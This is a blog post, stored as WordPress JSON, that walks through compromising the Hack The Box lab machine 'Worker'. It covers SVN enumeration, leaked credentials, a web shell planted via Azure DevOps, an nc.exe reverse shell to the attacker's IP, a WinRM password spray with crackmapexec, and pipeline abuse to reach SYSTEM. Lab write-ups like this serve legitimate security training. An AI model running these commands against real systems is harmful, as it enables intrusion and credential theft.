{"id":1479,"date":"2021-08-11T08:50:13","date_gmt":"2021-08-11T08:50:13","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1479"},"modified":"2021-08-11T09:37:38","modified_gmt":"2021-08-11T09:37:38","slug":"worker","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/08\/11\/worker\/","title":{"rendered":"Worker"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Machine Name<\/th>\n<th>Difficulty<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.eu\/machines\/270\" title=\"Worker\">Worker<\/a> - HTB<\/td>\n<td>Medium<\/td>\n<td>Windows<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.eu\/storage\/avatars\/13358d0b09074485f107f36625b50a5c.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>Let's start with an nmap scan.<\/p>\n<pre><code class=\"language-sh\">\nPORT     STATE SERVICE  VERSION\n80\/tcp   open  http     Microsoft IIS httpd 10.0\n|_http-csrf: Couldn&#039;t find any CSRF vulnerabilities.\n|_http-dombased-xss: Couldn&#039;t find any DOM based XSS.\n|_http-server-header: Microsoft-IIS\/10.0\n|_http-stored-xss: Couldn&#039;t find any stored XSS vulnerabilities.\n3690\/tcp open  svnserve Subversion\n5985\/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-csrf: Couldn&#039;t find any CSRF vulnerabilities.\n|_http-dombased-xss: Couldn&#039;t find any DOM based XSS.\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n|_http-stored-xss: Couldn&#039;t find any stored XSS vulnerabilities.\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows<\/code><\/pre>\n<p>After spotting svn I started enumerating it. WinRM (wsman) is also open on port 5985, which means that if we can identify a valid user we can connect. The presence of svn also made me think there might be a software project here. 
My svn findings are below:<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker]\n\u2514\u2500# svn ls svn:\/\/10.10.10.203\ndimension.worker.htb\/\nmoved.txt\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker]\n\u2514\u2500# svn log svn:\/\/10.10.10.203\n------------------------------------------------------------------------\nr5 | nathen | 2020-06-20 09:52:00 -0400 (Sat, 20 Jun 2020) | 1 line\n\nAdded note that repo has been migrated\n------------------------------------------------------------------------\nr4 | nathen | 2020-06-20 09:50:20 -0400 (Sat, 20 Jun 2020) | 1 line\n\nMoving this repo to our new devops server which will handle the deployment for us\n------------------------------------------------------------------------\nr3 | nathen | 2020-06-20 09:46:19 -0400 (Sat, 20 Jun 2020) | 1 line\n\n-\n------------------------------------------------------------------------\nr2 | nathen | 2020-06-20 09:45:16 -0400 (Sat, 20 Jun 2020) | 1 line\n\nAdded deployment script\n------------------------------------------------------------------------\nr1 | nathen | 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020) | 1 line\n\nFirst version\n------------------------------------------------------------------------\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker]\n\u2514\u2500# svn checkout svn:\/\/10.10.10.203\nA    dimension.worker.htb\nA    dimension.worker.htb\/LICENSE.txt\nA    dimension.worker.htb\/README.txt\nA    dimension.worker.htb\/assets\nA    dimension.worker.htb\/assets\/css\nA    dimension.worker.htb\/assets\/css\/fontawesome-all.min.css\nA    dimension.worker.htb\/assets\/css\/main.css\nA    dimension.worker.htb\/assets\/css\/noscript.css\nA    dimension.worker.htb\/assets\/js\nA    dimension.worker.htb\/assets\/js\/breakpoints.min.js\nA    dimension.worker.htb\/assets\/js\/browser.min.js\nA    dimension.worker.htb\/assets\/js\/jquery.min.js\nA    
dimension.worker.htb\/assets\/js\/main.js\nA    dimension.worker.htb\/assets\/js\/util.js\nA    dimension.worker.htb\/assets\/sass\nA    dimension.worker.htb\/assets\/sass\/base\nA    dimension.worker.htb\/assets\/sass\/base\/_page.scss\nA    dimension.worker.htb\/assets\/sass\/base\/_reset.scss\nA    dimension.worker.htb\/assets\/sass\/base\/_typography.scss\nA    dimension.worker.htb\/assets\/sass\/components\nA    dimension.worker.htb\/assets\/sass\/components\/_actions.scss\nA    dimension.worker.htb\/assets\/sass\/components\/_box.scss\nA    dimension.worker.htb\/assets\/sass\/components\/_button.scss\nA    dimension.worker.htb\/assets\/sass\/components\/_form.scss\nA    dimension.worker.htb\/assets\/sass\/components\/_icon.scss\nA    dimension.worker.htb\/assets\/sass\/components\/_icons.scss\nA    dimension.worker.htb\/assets\/sass\/components\/_image.scss\nA    dimension.worker.htb\/assets\/sass\/components\/_list.scss\nA    dimension.worker.htb\/assets\/sass\/components\/_table.scss\nA    dimension.worker.htb\/assets\/sass\/layout\nA    dimension.worker.htb\/assets\/sass\/layout\/_bg.scss\nA    dimension.worker.htb\/assets\/sass\/layout\/_footer.scss\nA    dimension.worker.htb\/assets\/sass\/layout\/_header.scss\nA    dimension.worker.htb\/assets\/sass\/layout\/_main.scss\nA    dimension.worker.htb\/assets\/sass\/layout\/_wrapper.scss\nA    dimension.worker.htb\/assets\/sass\/libs\nA    dimension.worker.htb\/assets\/sass\/libs\/_breakpoints.scss\nA    dimension.worker.htb\/assets\/sass\/libs\/_functions.scss\nA    dimension.worker.htb\/assets\/sass\/libs\/_mixins.scss\nA    dimension.worker.htb\/assets\/sass\/libs\/_vars.scss\nA    dimension.worker.htb\/assets\/sass\/libs\/_vendor.scss\nA    dimension.worker.htb\/assets\/sass\/main.scss\nA    dimension.worker.htb\/assets\/sass\/noscript.scss\nA    dimension.worker.htb\/assets\/webfonts\nA    dimension.worker.htb\/assets\/webfonts\/fa-brands-400.eot\nA    
dimension.worker.htb\/assets\/webfonts\/fa-brands-400.svg\nA    dimension.worker.htb\/assets\/webfonts\/fa-brands-400.ttf\nA    dimension.worker.htb\/assets\/webfonts\/fa-brands-400.woff\nA    dimension.worker.htb\/assets\/webfonts\/fa-brands-400.woff2\nA    dimension.worker.htb\/assets\/webfonts\/fa-regular-400.eot\nA    dimension.worker.htb\/assets\/webfonts\/fa-regular-400.svg\nA    dimension.worker.htb\/assets\/webfonts\/fa-regular-400.ttf\nA    dimension.worker.htb\/assets\/webfonts\/fa-regular-400.woff\nA    dimension.worker.htb\/assets\/webfonts\/fa-regular-400.woff2\nA    dimension.worker.htb\/assets\/webfonts\/fa-solid-900.eot\nA    dimension.worker.htb\/assets\/webfonts\/fa-solid-900.svg\nA    dimension.worker.htb\/assets\/webfonts\/fa-solid-900.ttf\nA    dimension.worker.htb\/assets\/webfonts\/fa-solid-900.woff\nA    dimension.worker.htb\/assets\/webfonts\/fa-solid-900.woff2\nA    dimension.worker.htb\/images\nA    dimension.worker.htb\/images\/bg.jpg\nA    dimension.worker.htb\/images\/overlay.png\nA    dimension.worker.htb\/images\/pic01.jpg\nA    dimension.worker.htb\/images\/pic02.jpg\nA    dimension.worker.htb\/images\/pic03.jpg\nA    dimension.worker.htb\/index.html\nA    moved.txt\nChecked out revision 5.\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker]\n\u2514\u2500# s                              \ns: command not found\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker]\n\u2514\u2500# ls                                                                                                                                                                                                                                  127 \u2a2f\n10.10.10.203  dimension.worker.htb  gobuster1  gobuster2  moved.txt\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker]\n\u2514\u2500# cat moved.txt       \nThis repository has been migrated and will no longer be maintaned here.\nYou can find the latest version at: 
http:\/\/devops.worker.htb\n\n\/\/ The Worker team :)\n<\/code><\/pre>\n<p>After updating my \/etc\/hosts file, I continued by checking the other revisions in svn.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker\/dimension.worker.htb]\n\u2514\u2500# cd ..                  \n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker]\n\u2514\u2500# svn up -r 2\nUpdating &#039;.&#039;:\nD    moved.txt\nA    deploy.ps1\nUpdated to revision 2.\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker]\n\u2514\u2500# ls -al        \ntotal 32\ndrwxr-xr-x  5 root root 4096 Aug 10 06:31 .\ndrwxr-xr-x 26 root root 4096 Aug 10 05:10 ..\ndrwxr-xr-x  4 root root 4096 Aug 10 05:28 10.10.10.203\n-rw-r--r--  1 root root  271 Aug 10 06:31 deploy.ps1\ndrwxr-xr-x  4 root root 4096 Aug 10 06:19 dimension.worker.htb\n-rw-r--r--  1 root root 1065 Aug 10 06:19 gobuster1\n-rw-r--r--  1 root root 1093 Aug 10 06:21 gobuster2\ndrwxr-xr-x  4 root root 4096 Aug 10 06:18 .svn\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker]\n\u2514\u2500# cat deploy.ps1 \n$user = &quot;nathen&quot; \n$plain = &quot;wendel98&quot;\n$pwd = ($plain | ConvertTo-SecureString)\n$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd\n$args = &quot;Copy-Site.ps1&quot;\nStart-Process powershell.exe -Credential $Credential -ArgumentList (&quot;-file $args&quot;)\n<\/code><\/pre>\n<p>Great, we found a user. I tried connecting to wsman with it but did not succeed. I then went to <strong><a href=\"http:\/\/devops.worker.htb\">http:\/\/devops.worker.htb<\/a><\/strong>, where I was able to log in to the basic authentication prompt that appeared with the credentials nathen:wendel98. 
When I worked as a developer at the Ministry of Health, we used TFS for process tracking. I like Microsoft, and there is a similar TFS on Azure as well. Tasks had been created and commits matching those tasks had been made. It was very clear that my goal was to plant a reverse shell in one of these projects and get a connection to the machine.<\/p>\n<p>I picked a project and created a new branch, then merged it, which let me upload my web shell. A screenshot of this is below.<\/p>\n<div aling=\"center\">\n<img decoding=\"async\" src=\"http:\/\/144.76.171.171\/blog\/wp-content\/uploads\/2021\/08\/azur-tfs.png\" style=\"width:100%; height:auto;\">\n<\/div>\n<p>Now let's view the web shell. For this I updated my \/etc\/hosts file again.<\/p>\n<div aling=\"center\">\n<img decoding=\"async\" src=\"http:\/\/144.76.171.171\/blog\/wp-content\/uploads\/2021\/08\/azur-webshell.png\" style=\"width:100%; height:auto;\">\n<\/div>\n<p>I started an SMB server on my Kali machine and copied nc.exe to the target machine. Then I got a reverse shell.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker]\n\u2514\u2500# \/usr\/local\/bin\/smbserver.py KUDAY . 
-smb2support                                                                                                                                                                                    130 \u2a2f\nImpacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation\n\n[*] Config file parsed\n[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0\n[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0\n[*] Config file parsed\n[*] Config file parsed\n[*] Config file parsed\n[*] Incoming connection (10.10.10.203,52693)\n[*] AUTHENTICATE_MESSAGE (\\,WORKER)\n[*] User WORKER\\ authenticated successfully\n[*] :::00::aaaaaaaaaaaaaaaa\n[*] Connecting Share(1:IPC$)\n[*] Connecting Share(2:KUDAY)\n[*] Disconnecting Share(1:IPC$)\n[*] Disconnecting Share(2:KUDAY)\n[*] Closing down connection (10.10.10.203,52693)\n[*] Remaining connections []<\/code><\/pre>\n<p>The payload I used to send nc.exe: <code>copy \\\\10.10.14.5\\KUDAY\\nc.exe C:\\Windows\\Temp\\nc.exe<\/code> <\/p>\n<pre><code class=\"language-sh\">C:\\Windows\\Temp\\nc.exe -e cmd.exe 10.10.14.5 443\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker]\n\u2514\u2500# nc -lvp 443 \nlistening on [any] 443 ...\nconnect to [10.10.14.5] from alpha.worker.htb [10.10.10.203] 52695\nMicrosoft Windows [Version 10.0.17763.1282]\n(c) 2018 Microsoft Corporation. All rights reserved.\n\nw:\\sites\\alpha.worker.htb&gt;<\/code><\/pre>\n<p>After this stage I did a lot of digging and ran automated scripts, but nothing useful came up. Then I started examining the w:\\ drive manually. 
I started PowerShell, and when I entered the command below I got interesting results.<\/p>\n<pre><code class=\"language-ps1\">Get-ChildItem -Recurse | Select-String &quot;pass&quot; -List | Select Path<\/code><\/pre>\n<pre><code>\n...\nW:\\sites\\twenty.worker.htb\\assets\\webfonts\\fa-regular-400.svg         \nW:\\sites\\twenty.worker.htb\\assets\\webfonts\\fa-regular-400.ttf         \nW:\\sites\\twenty.worker.htb\\assets\\webfonts\\fa-solid-900.eot           \nW:\\sites\\twenty.worker.htb\\assets\\webfonts\\fa-solid-900.svg           \nW:\\sites\\twenty.worker.htb\\assets\\webfonts\\fa-solid-900.ttf           \nW:\\svnrepos\\www\\conf\\passwd                                           \nW:\\svnrepos\\www\\conf\\svnserve.conf                                    \nW:\\svnrepos\\www\\db\\revs\\0\\1                                           \nW:\\svnrepos\\www\\db\\revs\\0\\3                                           \nW:\\svnrepos\\www\\hooks\\post-commit.tmpl                                \nW:\\svnrepos\\www\\hooks\\post-lock.tmpl                                  \nW:\\svnrepos\\www\\hooks\\post-revprop-change.tmpl                        \nW:\\svnrepos\\www\\hooks\\post-unlock.tmpl                                \nW:\\svnrepos\\www\\hooks\\pre-commit.tmpl                                 \nW:\\svnrepos\\www\\hooks\\pre-lock.tmpl                                   \nW:\\svnrepos\\www\\hooks\\pre-revprop-change.tmpl                         \nW:\\svnrepos\\www\\hooks\\pre-unlock.tmpl                                 \nW:\\svnrepos\\www\\hooks\\start-commit.tmpl   <\/code><\/pre>\n<p>When I read the passwd file I found usernames and passwords. Let's test them right away.<\/p>\n<pre><code class=\"language-sh\">\nPS W:\\svnrepos\\www\\conf&gt; cat passwd\ncat passwd\n### This file is an example password file for svnserve.\n### Its format is similar to that of svnserve.conf. 
As shown in the\n### example below it contains one section labelled [users].\n### The name and password for each user follow, one account per line.\n\n[users]\nnathen = wendel98\nnichin = fqerfqerf\nnichin = asifhiefh\nnoahip = player\nnuahip = wkjdnw\noakhol = bxwdjhcue\nowehol = supersecret\npaihol = painfulcode\nparhol = gitcommit\npathop = iliketomoveit\npauhor = nowayjose\npayhos = icanjive\nperhou = elvisisalive\npeyhou = ineedvacation\nphihou = pokemon\nquehub = pickme\nquihud = kindasecure\nrachul = guesswho\nraehun = idontknow\nramhun = thisis\nranhut = getting\nrebhyd = rediculous\nreeinc = iagree\nreeing = tosomepoint\nreiing = isthisenough\nrenipr = dummy\nrhiire = users\nriairv = canyou\nricisa = seewhich\nrobish = onesare\nrobisl = wolves11\nrobive = andwhich\nronkay = onesare\nrubkei = the\nrupkel = sheeps\nryakel = imtired\nsabken = drjones\nsamken = aqua\nsapket = hamburger\nsarkil = friday<\/code><\/pre>\n<p>I quickly built my wordlists.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker\/Users]\n\u2514\u2500# cat cred       \nnathen = wendel98\nnichin = fqerfqerf\nnichin = asifhiefh\nnoahip = player\nnuahip = wkjdnw\noakhol = bxwdjhcue\nowehol = supersecret\npaihol = painfulcode\nparhol = gitcommit\npathop = iliketomoveit\npauhor = nowayjose\npayhos = icanjive\nperhou = elvisisalive\npeyhou = ineedvacation\nphihou = pokemon\nquehub = pickme\nquihud = kindasecure\nrachul = guesswho\nraehun = idontknow\nramhun = thisis\nranhut = getting\nrebhyd = rediculous\nreeinc = iagree\nreeing = tosomepoint\nreiing = isthisenough\nrenipr = dummy\nrhiire = users\nriairv = canyou\nricisa = seewhich\nrobish = onesare\nrobisl = wolves11\nrobive = andwhich\nronkay = onesare\nrubkei = the\nrupkel = sheeps\nryakel = imtired\nsabken = drjones\nsamken = aqua\nsapket = hamburger\nsarkil = friday\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker\/Users]\n\u2514\u2500# cat convert.py    
\ndosya = open(&quot;cred&quot;)\ncred = dosya.read().split(&quot;\\n&quot;)\ndosya.close()\n\nusername=[]\npassword=[]\n\ndosya4username = open(&quot;username&quot;,&quot;a&quot;)\ndosya4password = open(&quot;password&quot;,&quot;a&quot;)\nfor i in cred:\n    dosya4username.write(i.replace(&quot;=&quot;,&quot; &quot;).split()[0]+&quot;\\n&quot;)\n    dosya4password.write(i.replace(&quot;=&quot;,&quot; &quot;).split()[1]+&quot;\\n&quot;)\ndosya4username.close()\ndosya4password.close()\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker\/Users]\n\u2514\u2500# python3 convert.py\nTraceback (most recent call last):\n  File &quot;\/root\/oscp\/htb\/Worker\/Users\/convert.py&quot;, line 11, in &lt;module&gt;\n    dosya4username.write(i.replace(&quot;=&quot;,&quot; &quot;).split()[0]+&quot;\\n&quot;)\nIndexError: list index out of range\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker\/Users]\n\u2514\u2500# cat username                                                                                                                                                        1 \u2a2f\nnathen\nnichin\nnichin\nnoahip\nnuahip\noakhol\nowehol\npaihol\nparhol\npathop\npauhor\npayhos\nperhou\npeyhou\nphihou\nquehub\nquihud\nrachul\nraehun\nramhun\nranhut\nrebhyd\nreeinc\nreeing\nreiing\nrenipr\nrhiire\nriairv\nricisa\nrobish\nrobisl\nrobive\nronkay\nrubkei\nrupkel\nryakel\nsabken\nsamken\nsapket\nsarkil\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker\/Users]\n\u2514\u2500# cat password \nwendel98\nfqerfqerf\nasifhiefh\nplayer\nwkjdnw\nbxwdjhcue\nsupersecret\npainfulcode\ngitcommit\niliketomoveit\nnowayjose\nicanjive\nelvisisalive\nineedvacation\npokemon\npickme\nkindasecure\nguesswho\nidontknow\nthisis\ngetting\nrediculous\niagree\ntosomepoint\nisthisenough\ndummy\nusers\ncanyou\nseewhich\nonesare\nwolves11\nandwhich\nonesare\nthe\nsheeps\nimtired\ndrjones\naqua\nhamburger\nfriday<\/code><\/pre>\n<p>There is a Python error up there, but 
it occurs at the very end of the program, as anyone familiar with Python will recognize. It is caused by the empty element on the last line when the file is read. Nothing to worry about. Let's try it now!<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker\/Users]\n\u2514\u2500# crackmapexec winrm  -u username -p password --no-bruteforce 10.10.10.203\nWINRM       10.10.10.203    5985   NONE             [*] None (name:10.10.10.203) (domain:None)\nWINRM       10.10.10.203    5985   NONE             [*] http:\/\/10.10.10.203:5985\/wsman\nWINRM       10.10.10.203    5985   NONE             [-] None\\nathen:wendel98\nWINRM       10.10.10.203    5985   NONE             [-] None\\nichin:fqerfqerf\nWINRM       10.10.10.203    5985   NONE             [-] None\\nichin:asifhiefh\nWINRM       10.10.10.203    5985   NONE             [-] None\\noahip:player\nWINRM       10.10.10.203    5985   NONE             [-] None\\nuahip:wkjdnw\nWINRM       10.10.10.203    5985   NONE             [-] None\\oakhol:bxwdjhcue\nWINRM       10.10.10.203    5985   NONE             [-] None\\owehol:supersecret\nWINRM       10.10.10.203    5985   NONE             [-] None\\paihol:painfulcode\nWINRM       10.10.10.203    5985   NONE             [-] None\\parhol:gitcommit\nWINRM       10.10.10.203    5985   NONE             [-] None\\pathop:iliketomoveit\nWINRM       10.10.10.203    5985   NONE             [-] None\\pauhor:nowayjose\nWINRM       10.10.10.203    5985   NONE             [-] None\\payhos:icanjive\nWINRM       10.10.10.203    5985   NONE             [-] None\\perhou:elvisisalive\nWINRM       10.10.10.203    5985   NONE             [-] None\\peyhou:ineedvacation\nWINRM       10.10.10.203    5985   NONE             [-] None\\phihou:pokemon\nWINRM       10.10.10.203    5985   NONE             [-] None\\quehub:pickme\nWINRM       10.10.10.203    5985   NONE             [-] 
None\\quihud:kindasecure\nWINRM       10.10.10.203    5985   NONE             [-] None\\rachul:guesswho\nWINRM       10.10.10.203    5985   NONE             [-] None\\raehun:idontknow\nWINRM       10.10.10.203    5985   NONE             [-] None\\ramhun:thisis\nWINRM       10.10.10.203    5985   NONE             [-] None\\ranhut:getting\nWINRM       10.10.10.203    5985   NONE             [-] None\\rebhyd:rediculous\nWINRM       10.10.10.203    5985   NONE             [-] None\\reeinc:iagree\nWINRM       10.10.10.203    5985   NONE             [-] None\\reeing:tosomepoint\nWINRM       10.10.10.203    5985   NONE             [-] None\\reiing:isthisenough\nWINRM       10.10.10.203    5985   NONE             [-] None\\renipr:dummy\nWINRM       10.10.10.203    5985   NONE             [-] None\\rhiire:users\nWINRM       10.10.10.203    5985   NONE             [-] None\\riairv:canyou\nWINRM       10.10.10.203    5985   NONE             [-] None\\ricisa:seewhich\nWINRM       10.10.10.203    5985   NONE             [-] None\\robish:onesare\nWINRM       10.10.10.203    5985   NONE             [+] None\\robisl:wolves11 (Pwn3d!)\n<\/code><\/pre>\n<pre><code>robisl:wolves11<\/code><\/pre>\n<p>Great! 
Let's connect with evil-winrm.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker]\n\u2514\u2500# evil-winrm -i 10.10.10.203 -u robisl -p wolves11                                                                                                                                                                                    130 \u2a2f\n\nEvil-WinRM shell v2.4\n\nInfo: Establishing connection to remote endpoint\n\n*Evil-WinRM* PS C:\\Users\\robisl\\Documents&gt; cd ..\n*Evil-WinRM* PS C:\\Users\\robisl&gt; ls\n\n    Directory: C:\\Users\\robisl\n\nMode                LastWriteTime         Length Name\n----                -------------         ------ ----\nd-r---         4\/5\/2020   7:32 PM                Desktop\nd-r---         4\/4\/2020  11:35 PM                Documents\nd-r---        9\/15\/2018   9:12 AM                Downloads\nd-r---        9\/15\/2018   9:12 AM                Favorites\nd-r---        9\/15\/2018   9:12 AM                Links\nd-r---        9\/15\/2018   9:12 AM                Music\nd-r---        9\/15\/2018   9:12 AM                Pictures\nd-----        9\/15\/2018   9:12 AM                Saved Games\nd-r---        9\/15\/2018   9:12 AM                Videos\n\ncd*Evil-WinRM* PS C:\\Users\\robisl&gt; cd Desktop\n*Evil-WinRM* PS C:\\Users\\robisl\\Desktop&gt; ls\n\n    Directory: C:\\Users\\robisl\\Desktop\n\nMode                LastWriteTime         Length Name\n----                -------------         ------ ----\n-ar---        8\/10\/2021   8:59 PM             34 user.txt\n\ncat*Evil-WinRM* PS C:\\Users\\robisl\\Desktop&gt; cat user.txt\n5455ed43a205185208157dcc76502d43\n*Evil-WinRM* PS C:\\Users\\robisl\\Desktop&gt; <\/code><\/pre>\n<p>I then logged in to Azure again with this user and saw a different project. I noticed that I could create pipelines. 
DevOps is not an area I know very well, and I should say that up front, so I won't go into things here that I'm not sure about. I'm waiting for Pentester Academy's courses \ud83d\ude42 However, I do know that I can run code at the operating-system level through pipelines. When I ran code like the one below, I got a reverse shell with root privileges (so to speak, since the machine is Windows).<\/p>\n<div aling=\"center\">\n<img decoding=\"async\" src=\"http:\/\/144.76.171.171\/blog\/wp-content\/uploads\/2021\/08\/pipline.png\" style=\"width:100%; height:auto;\">\n<\/div>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[~\/oscp\/htb\/Worker]\n\u2514\u2500# nc -lvp 443                                                                                                  1 \u2a2f\nlistening on [any] 443 ...\nconnect to [10.10.14.5] from devops.worker.htb [10.10.10.203] 50788\nMicrosoft Windows [Version 10.0.17763.1282]\n(c) 2018 Microsoft Corporation. 
All rights reserved.\n\nW:\\agents\\agent11\\_work\\8\\s&gt;whoami\nwhoami\nnt authority\\system\n\nW:\\agents\\agent11\\_work\\8\\s&gt;c:\nc:\n\nC:\\&gt;dir &quot;*root*.txt&quot; \/s \/p\ndir &quot;*root*.txt&quot; \/s \/p\n Volume in drive C has no label.\n Volume Serial Number is 32D6-9041\n\n Directory of C:\\Users\\Administrator\\Desktop\n\n2021-08-10  20:59                34 root.txt\n               1 File(s)             34 bytes\n\n     Total Files Listed:\n               1 File(s)             34 bytes\n               0 Dir(s)  10\u00a0384\u00a0883\u00a0712 bytes free\n\nC:\\&gt;cd C:\\Users\\Administrator\\Desktop\ncd C:\\Users\\Administrator\\Desktop\n\nC:\\Users\\Administrator\\Desktop&gt;dtype root.txt\ndtype root.txt\n&#039;dtype&#039; is not recognized as an internal or external command,\noperable program or batch file.\n\nC:\\Users\\Administrator\\Desktop&gt;type root.txt\ntype root.txt\nfdae81646ff993d7125b423f6fd93f8d\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Machine Name Difficulty OS Logo Worker &#8211; HTB Medium Windows Walkthrough Let's start with an nmap scan. 
PORT STATE SERVICE VERSION 80\/tcp open http Microsoft IIS httpd&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/08\/11\/worker\/\">Read more<span class=\"screen-reader-text\">Worker<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[600,498,468],"tags":[602,601],"class_list":["post-1479","post","type-post","status-publish","format-standard","hentry","category-devops","category-walkthrough","category-windows","tag-azur","tag-devops","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1479","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1479"}],"version-history":[{"count":3,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1479\/revisions"}],"predecessor-version":[{"id":1486,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1479\/revisions\/1486"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1479"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1479"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1479"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}